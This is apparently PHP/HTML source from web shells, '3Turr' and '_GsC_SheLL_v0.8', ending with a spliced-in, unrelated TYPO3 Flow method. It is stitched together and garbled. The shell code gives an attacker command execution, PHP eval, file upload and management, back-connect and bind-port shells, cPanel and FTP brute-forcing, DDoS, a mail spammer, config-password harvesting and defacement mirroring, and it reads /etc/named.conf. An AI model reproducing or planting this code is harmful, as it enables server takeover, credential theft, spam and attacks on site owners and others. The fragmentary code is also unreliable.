<div style="position:absolute;top:30px;right:50px; font-size:25px;font-family:auto;z-index:-1;" rowspan="8"><font color=red><img height="190px" height="190px" alt="3Turr" src="http://i.imgur.com/mVdgU0V.png" /></font><center><font style="color:#5BEEFF;text-shadow: 1px 1px 36px #5BEEFF, 0 0 25px #5BEEFF, 0 0 30px #5BEEFF, 0 0 30px #5BEEFF;">3</font><font style="color:red;text-shadow: 1px 1px 36px red, 0 0 25px red, 0 0 30px red;">Turr</font>
</div>
<div class="whole">
<form method=post name=mf style="display:none;">
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>
<div class="header"><table class="headmain" width="100%" border="0" align="lift">
<tr>
<td width="3%"><span>Uname:</span></td>
<td colspan="2">' . substr(@php_uname(), 0, 120) . '</td>
</tr>
<tr>
<td><span>User:</span></td>
<td>' . $uid . ' [ ' . $user . ' ] <span> Group: </span>' . $gid . ' [ ' . $group . ' ]
</tr>
<tr>
<td><span>PHP:</span></td>
<td>' . @phpversion() . ' <span> Safe Mode: ' . $safe_modes . '</span></td>
</tr>
<tr>
<td><span>IP:</span></td>
<td>' . @$_SERVER["SERVER_ADDR"] . ' <span>Server IP:</span> ' . @$_SERVER["REMOTE_ADDR"] . '</td>
</tr>
<tr>
<td><span>WEBS:</span></td>
<td width="76%">';
if ($GLOBALS['sys'] == 'unix') {
$d0mains = @file("/etc/named.conf");
if (!$d0mains) {
echo "CANT READ named.conf";
} else {
$count;
foreach ($d0mains as $d0main) {
if (@ereg("zone", $d0main)) {
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
flush();
$count++;
}
}
}
echo "<b>{$count}</b> Domains";
}
} else {
echo "CANT READ |Windows|";
}
echo '</td>
</tr>
<tr>
<td height="16"><span>HDD:</span></td>
<td>' . yemenSize($totalSpace) . ' <span>Free:</span>' . yemenSize($freeSpace) . ' [' . (int) ($freeSpace / $totalSpace * 100) . '%]</td>
</tr>';
if ($GLOBALS['sys'] == 'unix') {
if (!@ini_get('safe_mode')) {
echo '<tr><td height="18" colspan="2"><span>Useful : </span>';
$userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
foreach ($userful as $item) {
if (yemenWhich($item)) {
echo $item . ',';
}
}
echo '</td>
</tr>
<tr>
<td height="0" colspan="2"><span>Downloader: </span>';
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
foreach ($downloaders as $item2) {
if (yemenWhich($item2)) {
echo $item2 . ',';
}
}
echo '</td>
</tr>';
} else {
echo '<tr><td height="18" colspan="2"><span>useful: </span>';
echo '--------------</td>
</tr><td height="0" colspan="2"><span>Downloader: </span>-------------</td>
</tr>';
}
} else {
echo '<tr><td height="18" colspan="2"><span>Window: </span>';
echo yemenEx('ver');
}
echo '<tr>
<td height="16" colspan="2">' . $disfun . '</td>
</tr>
<tr>
<td height="16" colspan="2"><span>cURL:' . $curl . ' MySQL:' . $mysql . ' MSSQL:' . $mssql . ' PostgreSQL:' . $pg . ' Oracle: </span>' . $or . '</td><td width="15%"></td>
</tr>
<tr>
<td height="11" style="width:70%" colspan="3"><span>Open_basedir:' . $open_b . ' Safe_mode_exec_dir:' . $safe_exe . ' Safe_mode_include_dir:' . $safe_include . '</td>
</tr>
<tr>
<td height="11"><span>Server </span></td>
<td colspan="2">' . @getenv('SERVER_SOFTWARE') . '</td>
</tr>';
if ($GLOBALS[sys] == "win") {
echo '<tr>
<td height="12"><span>DRIVE:</span></td>
<td colspan="2">' . $drives . '</td>
</tr>';
}
echo '<tr>
<td height="12"><span>PWD:</span></td>
<td colspan="2" >' . $cwd_links . ' <a href=# onclick="g(\'FilesMan\',\'' . base64_encode($GLOBALS['home_cwd']) . '\')"><font color=red >[HOME]</font></a></td>
</tr>
</table>
</div>
<div id="menu-box">
<style type="text/css">
div#menu{height:40px;:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-bg.png) repeat-x;}
div#menu ul{margin:0;padding:0;list-style:none;float:left;}
div#menu ul.menu {padding-left:10px;}
div#menu li{position:relative;z-index:9;margin:0;padding:0 5px 0 0;display:block;float:left;}
div#menu li:hover>ul {left:-2px;}
div#menu a {position:relative;z-index:10;height:40px;display:block;float:left;line-height:40px;text-decoration:none;font:normal 13px Trebuchet MS;}
div#menu a:hover {color:#000;}
div#menu li.current a {}
div#menu span {display:block;cursor:pointer;background-repeat:no-repeat;background-position:95% 0;}
div#menu ul ul a.parent span {background-position:95% 8px;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer.gif);}
div#menu ul ul a.parent:hover span {background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/item-pointer-mover.gif);}
div#menu a {padding:0 6px 0 10px;line-height:30px;color:#fff;}
div#menu span {margin-top:5px;}
div#menu li {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/main-delimiter.png) 98% 4px no-repeat;}
div#menu li.last {background:none;}
div#menu ul ul li {background:none;}
div#menu ul ul {position:absolute;top:38px;left:-999em;width:180%;padding:1px 0 0 0;background:rgb(45,45,45);margin-top:1px;}
div#menu ul ul a {padding:0 0 0 15px;height:auto;float:none;display:block;line-height:24px;color:rgb(169,169,169);}
div#menu ul ul span {margin-top:0;padding-right:15px;_padding-right:20px;color:rgb(169,169,169);}
div#menu ul ul a:hover span {color:#fff;}div#menu ul ul li.last {background:none;}
div#menu ul ul li {width:100%;}div#menu ul ul ul {padding:1;margin:-38px 0 0 163px !important;margin-left:172px;}div#menu ul ul ul {background:rgb(41,41,41);}
div#menu ul ul ul ul {background:rgb(38,38,38);}div#menu ul ul ul ul {background:rgb(35,35,35);}
div#menu li.back {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat right -44px !important;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);width:13px;height:44px;z-index:8;position:absolute;margin:-1px 0 0 -5px;}
div#menu li.back .left {background:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.png) no-repeat top left !important;background-image:url(http://apycom.com/ssc-data/items/1/00bfff/images/lava.gif);height:44px;margin-right:8px;}
</style>
<div id="menu"><ul class="menu">
<li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
<li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">SYSTEM</a></li>
<li><a href="#">PHP</a>
<ul>
<li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
<li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
</ul>
<li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
<li><a href="#" >BRUTE&CRACK</a>
<ul>
<li><a href="#" onclick="g(\'bf\',null,\'\',\'\',\'\')">CPanel</a></li>
<li><a href="#" onclick="g(\'bruteftp\',null,\'\',\'\',\'\')">FTP</a></li>
</ul>
</li>
<li><a href="#">NETWORK</a>
<ul>
<li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">BACK CONNECT</a></li>
<li><a href="#" onclick="g(\'net\',null,\'\',\'\',\'\')">BIND PORT</a></li>
</ul>
<li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
<li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
<li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
<!--
<li><a href="#" onclick="g(\'wp\',null,\'\',\'\',\'\')">Mass Wpress</a></li>
<li><a href="#" onclick="g(\'joom\',null,\'\',\'\',\'\')">Mass Joomla</a></li>
-->
<li><a href="#">Perl Sh3ll</a>
<ul>
<li><a href="#" onclick="g(\'perl\',null,\'\',\'\',\'\')">CGI 1.0v</a></li>
<li><a href="#" onclick="g(\'perl4\',null,\'\',\'\',\'\')">CGI 1.4v</a></li>
</ul>
</li>
<li><a href="#" >Mirrors</a>
<ul>
<li><a href="#" onclick="g(\'zone\',null,\'\',\'\',\'\')">Zone-h.org</a></li>
<li><a href="#" onclick="g(\'zonejoy\',null,\'\',\'\',\'\')">Aljyyosh.org</a></li>
</ul>
</li>
<li><a href="#">TOOLS</a>
<ul>
<li><a href="#" onclick="g(\'rev\',null,\'\',\'\',\'\')">Reverse IP</a></li>
<li><a href="#" onclick="g(\'zip\',null,\'\',\'\',\'\')">ZIP</a></li>
<li><a href="#" onclick="g(\'mail\',null,\'\',\'\',\'\')">Mail Spammer</a></li>
</ul>
</li>
<li><a href="#" >3Turr-VIP</a>
<ul>
<li><a href="#" onclick="g(\'conpass\',null,\'\',\'\',\'\')">C0nf1G-P4$$\'s</a></li>
</ul>
</li>
<li><a href="#" onclick="g(\'yemen\',null,\'\',\'\',\'\')">ABOUT</a></li>
</ul>
</div>
';
?>
<footer id="det" style="z-index:9999;background:#000;position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0);padding:3px; text-align:center; border-top: 1px solid #ff0000; border-bottom: 2px solid #990000;color:red;">
<font align=center>3Turr ~ SH311</font>
</footer>
<form style="z-index:9999;position:fixed;left:1;bottom:4px;display:inline" onsubmit="Encoder('encod');g('proc',null,this.c.value);return false;">
<input style="width:290px" type=text id=encod name=c value="" placeholder="Execute" <?php
!isset($_POST['a']) || $_POST['a'] != 'proc' || !isset($_POST['p1']) || $_POST['p1'] == '' ? print "autofocus" : 0;
?>
>
<input type=submit style="color:red;width:30px;" value=">>">
</form>
<!--###################-->
<form style="z-index:9999;position:fixed;right:10px;bottom:3px;display:inline;" method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='<?php
echo htmlspecialchars($GLOBALS['cwd']);
?>
'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='<?php
echo isset($_POST['charset']) ? $_POST['charset'] : '';
?>
'>
<input style="border:1px solid #5BEEFF;height:19px;value:[ select ];" class="toolsInp" type=file name=f > <input style="color:red;width:30px;" type=submit value=">>" ></form>
<?php
}
echo "<title>_GsC_SheLL_v0.8_By _GsC_</title>";
//Style CSS
echo "<style>\ninput {\n background: #b00;\n color: #fff;\n }\n\n input:hover {\n background: #000;\n }\n\n select {\n background: #b00;\n color: #fff;\n }\n \n select:hover {\n background: #000;\n }\n\n hr { color: red;\n background-color: red;\n height: 3px; \n width:100%;\n border:0; }\n\n .footer table { border:1px dashed black\n }\n\n .footer tr { border:1px groove black\n }\n\n .footer td { border:1px groove black\n }\n\n textarea {\n background: #b00;\n color: #fff;\n }\n\n textarea:hover {\n background: #000;\n }\n\n body {\n font-family: courier,courier-new,arial;\n background-color:black;\n color:white;\n }\n\n A:link { text-decoration: none;\n color:white\n }\n\n A:hover { \n color:red\n }\n\n a:visited { text-decoration: none;\n color: #FFFFFF;\n }\n\n A:visited:hover { \n color:red\n }\n\n table {border:1px dashed red}\n\n td {border:1px groove #666666}\n\n #dropper:hover {\n color: #fff;\n }\n </style> ";
//Banner
echo "<center><b><a href=\"?\"><font color=\"green\" size=\"8\">_GsC_</font><font color=\"white\" size=\"8\">SheLL_</font><font color=\"red\" size=\"8\">V0.8_</font></a></b></center><br> <br>";
echo "<hr>";
//Applicazioni
echo "<center><b>[<a href=?mode=fakemail>Fake mailer</a>] [<a href=?mode=PHPinfo>PHP info</a>]</center><hr>";
//Info
echo "<center><table border=\"0\"><tr><td><b><font color=red>Ip server:</font></b> " . $_SERVER['SERVER_ADDR'] . "</td><td><b><font color=red>Server Software:</font></b> " . $_SERVER['SERVER_SOFTWARE'] . "</td><td><b><font color=red>Versione PHP:</font></b> " . phpversion() . " </tr><tr>\n<td><b><font color=red>Your ip:</font></b> " . $_SERVER['REMOTE_ADDR'] . "</td><td><b><font color=red>Safe mode:</font></b>";
if (@ini_get("safe_mode") == "1" || @ini_get("safe_mode") == "on") {
echo "On";
} else {
echo "Off";
}
echo "</td><td><b><font color=red>id:</font></b> " . get_current_user() . " | uid= " . getmyuid() . " | gid= " . getmygid() . "</td></tr></table></center><br><hr>";
//Variabili Generali
$dir = htmlspecialchars($_GET['dir']);
// Home shell
if (!isset($mode)) {
$_GET['dir'] == '' ? $dir = @getcwd() : ($dir = htmlspecialchars($_GET['dir']));
@chdir($dir);
if (isset($dir)) {
echo "<form method=get> Dir : <input type=text name=dir value={$dir} size=65%> <input type=submit value=Invia></form>";
}
echo "<table width=\"100%\" border=1><tr><td><b>File name</b></td><td><b>Tipo</b></td><td><b>Size (KB)</b></td><td><b>Chmod</b></td><td><b>Azioni</b></td></tr>";
foreach (glob("*") as $file) {
$chmod = substr(sprintf('%o', fileperms($file)), -3);
if (is_dir($file)) {
if (isset($dir)) {
echo "\n \n \n <tr>\n <td>\n <a href=?dir=" . @getcwd() . "/" . $file . ">\n <font color=\"red\">{$file}</font>\n </a>\n </td>\n <td>\n Folder\n <td>\n " . filesize($file) . "\n </td>\n <td>\n {$chmod}\n </td>\n <td>\n [<a href=?mode=rename&file={$dir}/{$file}>R</a>] [<a href=?mode=delete&file={$dir}/{$file}>D</a>] [<a href=?mode=copy&file={$dir}/{$file}>C</a>] [<a href=?mode=chmod&file={$dir}/{$file}&chmod={$chmod}>P</a>] [<a href=?mode=download&file={$dir}/{$file}>D</a>]\n </td>\n </tr>\n ";
/**
* Render information about the current request, if possible
*
* @return string
*/
protected function renderRequestInfo()
{
$output = '';
if (Bootstrap::$staticObjectManager instanceof ObjectManagerInterface) {
$bootstrap = Bootstrap::$staticObjectManager->get(\TYPO3\Flow\Core\Bootstrap::class);
/* @var Bootstrap $bootstrap */
$requestHandler = $bootstrap->getActiveRequestHandler();
if ($requestHandler instanceof HttpRequestHandlerInterface) {
$request = $requestHandler->getHttpRequest();
$response = $requestHandler->getHttpResponse();
$output .= PHP_EOL . 'HTTP REQUEST:' . PHP_EOL . ($request == '' ? '[request was empty]' : $request) . PHP_EOL;
$output .= PHP_EOL . 'HTTP RESPONSE:' . PHP_EOL . ($response == '' ? '[response was empty]' : $response) . PHP_EOL;
$output .= PHP_EOL . 'PHP PROCESS:' . PHP_EOL . 'Inode: ' . getmyinode() . PHP_EOL . 'PID: ' . getmypid() . PHP_EOL . 'UID: ' . getmyuid() . PHP_EOL . 'GID: ' . getmygid() . PHP_EOL . 'User: ' . get_current_user() . PHP_EOL;
}
}
return $output;
}
